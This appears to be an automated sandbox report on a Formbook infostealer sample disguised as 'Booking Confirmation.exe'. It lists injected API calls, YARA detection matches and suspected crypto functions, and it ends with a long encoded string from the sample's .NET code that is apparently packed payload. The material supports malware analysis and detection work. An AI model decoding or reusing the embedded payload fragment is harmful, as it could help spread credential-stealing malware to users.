Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9760 NtOpenProcess,		5_2_018A9760
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018AA770 NtOpenThread,		5_2_018AA770
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9770 NtSetInformationFile,		5_2_018A9770
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A96D0 NtCreateKey,		5_2_018A96D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9610 NtEnumerateValueKey,		5_2_018A9610
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9650 NtQueryValueKey,		5_2_018A9650
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9670 NtQueryInformationProcess,		5_2_018A9670
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D295D0 NtClose,LdrInitializeThunk,		8_2_04D295D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29540 NtReadFile,LdrInitializeThunk,		8_2_04D29540
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D296D0 NtCreateKey,LdrInitializeThunk,		8_2_04D296D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D296E0 NtFreeVirtualMemory,LdrInitializeThunk,		8_2_04D296E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29650 NtQueryValueKey,LdrInitializeThunk,		8_2_04D29650
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29660 NtAllocateVirtualMemory,LdrInitializeThunk,		8_2_04D29660
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29FE0 NtCreateMutant,LdrInitializeThunk,		8_2_04D29FE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29780 NtMapViewOfSection,LdrInitializeThunk,		8_2_04D29780
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29710 NtQueryInformationToken,LdrInitializeThunk,		8_2_04D29710
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29840 NtDelayExecution,LdrInitializeThunk,		8_2_04D29840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29860 NtQuerySystemInformation,LdrInitializeThunk,		8_2_04D29860
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D299A0 NtCreateSection,LdrInitializeThunk,		8_2_04D299A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29910 NtAdjustPrivilegesToken,LdrInitializeThunk,		8_2_04D29910
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29A50 NtCreateFile,LdrInitializeThunk,		8_2_04D29A50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D295F0 NtQueryInformationFile,		8_2_04D295F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29560 NtWriteFile,		8_2_04D29560
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D2AD30 NtSetContextThread,		8_2_04D2AD30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29520 NtWaitForSingleObject,		8_2_04D29520
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29670 NtQueryInformationProcess,		8_2_04D29670
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29610 NtEnumerateValueKey,		8_2_04D29610
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D297A0 NtUnmapViewOfSection,		8_2_04D297A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D2A770 NtOpenThread,		8_2_04D2A770
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29770 NtSetInformationFile,		8_2_04D29770
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29760 NtOpenProcess,		8_2_04D29760
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D2A710 NtOpenProcessToken,		8_2_04D2A710
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29730 NtQueryVirtualMemory,		8_2_04D29730
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D298F0 NtReadVirtualMemory,		8_2_04D298F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D298A0 NtWriteVirtualMemory,		8_2_04D298A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D2B040 NtSuspendThread,		8_2_04D2B040
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29820 NtEnumerateKey,		8_2_04D29820
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D299D0 NtCreateProcessEx,		8_2_04D299D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29950 NtQueueApcThread,		8_2_04D29950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29A80 NtOpenDirectoryObject,		8_2_04D29A80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29A10 NtQuerySection,		8_2_04D29A10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29A00 NtProtectVirtualMemory,		8_2_04D29A00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29A20 NtResumeThread,		8_2_04D29A20
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D2A3B0 NtGetContextThread,		8_2_04D2A3B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29B00 NtSetValueKey,		8_2_04D29B00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339D60 NtCreateFile,		8_2_04339D60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339E10 NtReadFile,		8_2_04339E10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339E90 NtClose,		8_2_04339E90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339F40 NtAllocateVirtualMemory,		8_2_04339F40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339D1C NtCreateFile,		8_2_04339D1C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339D62 NtCreateFile,		8_2_04339D62
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339DB2 NtReadFile,		8_2_04339DB2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339E0A NtReadFile,		8_2_04339E0A

Detected potential crypto function

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 0_2_0247C2B0		0_2_0247C2B0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 0_2_02479990		0_2_02479990
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 0_2_002C379D		0_2_002C379D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 4_2_002D379D		4_2_002D379D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00401030		5_2_00401030
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041E212		5_2_0041E212
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041D306		5_2_0041D306
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00402D90		5_2_00402D90
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041E5B7		5_2_0041E5B7
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041E5BA		5_2_0041E5BA
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00409E40		5_2_00409E40
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00409E3B		5_2_00409E3B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041CFA6		5_2_0041CFA6
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00402FB0		5_2_00402FB0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186F900		5_2_0186F900
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01884120		5_2_01884120
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187B090		5_2_0187B090
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018920A0		5_2_018920A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_019320A8		5_2_019320A8
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_019328EC		5_2_019328EC
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921002		5_2_01921002
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0193E824		5_2_0193E824
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189EBB0		5_2_0189EBB0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192DBD2		5_2_0192DBD2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01932B28		5_2_01932B28
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_019322AE		5_2_019322AE
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892581		5_2_01892581
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_019325DD		5_2_019325DD
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187D5E0		5_2_0187D5E0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01932D07		5_2_01932D07
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01860D20		5_2_01860D20
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01931D55		5_2_01931D55
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187841F		5_2_0187841F
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192D466		5_2_0192D466
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01931FF1		5_2_01931FF1
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01932EF7		5_2_01932EF7
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192D616		5_2_0192D616
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01886E30		5_2_01886E30
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00DC379D		5_2_00DC379D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAD466		8_2_04DAD466
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF841F		8_2_04CF841F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB25DD		8_2_04DB25DD
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFD5E0		8_2_04CFD5E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12581		8_2_04D12581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB1D55		8_2_04DB1D55
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB2D07		8_2_04DB2D07
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE0D20		8_2_04CE0D20
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB2EF7		8_2_04DB2EF7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAD616		8_2_04DAD616
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D06E30		8_2_04D06E30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB1FF1		8_2_04DB1FF1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB28EC		8_2_04DB28EC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFB090		8_2_04CFB090
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D120A0		8_2_04D120A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB20A8		8_2_04DB20A8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1002		8_2_04DA1002
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DBE824		8_2_04DBE824
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEF900		8_2_04CEF900
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D04120		8_2_04D04120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB22AE		8_2_04DB22AE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DADBD2		8_2_04DADBD2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1EBB0		8_2_04D1EBB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB2B28		8_2_04DB2B28
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433E5BA		8_2_0433E5BA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04322D90		8_2_04322D90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04329E3B		8_2_04329E3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04329E40		8_2_04329E40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04322FB0		8_2_04322FB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433CFA6		8_2_0433CFA6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433E212		8_2_0433E212
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433D306		8_2_0433D306

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 04CEB150 appears 35 times
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: String function: 0186B150 appears 35 times

Sample file is different than original file name gathered from version info

Source: Booking Confirmation.exe	Binary or memory string: OriginalFilename vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameriched20.dllp( vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: k,\\StringFileInfo\\000004B0\\OriginalFilename vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAsyncState.dllF vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000000.00000000.646928778.00000000002C2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIConnectionPoint.exe6 vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000000.00000002.676504964.0000000006D10000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000000.00000002.676596861.0000000006E90000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLegacyPathHandling.dllN vs Booking Confirmation.exe
Source: Booking Confirmation.exe	Binary or memory string: OriginalFilename vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000004.00000002.668906261.00000000002D2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIConnectionPoint.exe6 vs Booking Confirmation.exe
Source: Booking Confirmation.exe	Binary or memory string: OriginalFilename vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000005.00000002.710355206.000000000195F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000005.00000002.710181246.00000000015BC000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000005.00000002.709572293.0000000000DC2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIConnectionPoint.exe6 vs Booking Confirmation.exe
Source: Booking Confirmation.exe	Binary or memory string: OriginalFilenameIConnectionPoint.exe6 vs Booking Confirmation.exe

Uses 32bit PE files

Source: Booking Confirmation.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: Booking Confirmation.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

.NET source code contains long base64-encoded strings

Source: Booking Confirmation.exe, LogIn.cs	Base64 encoded string: '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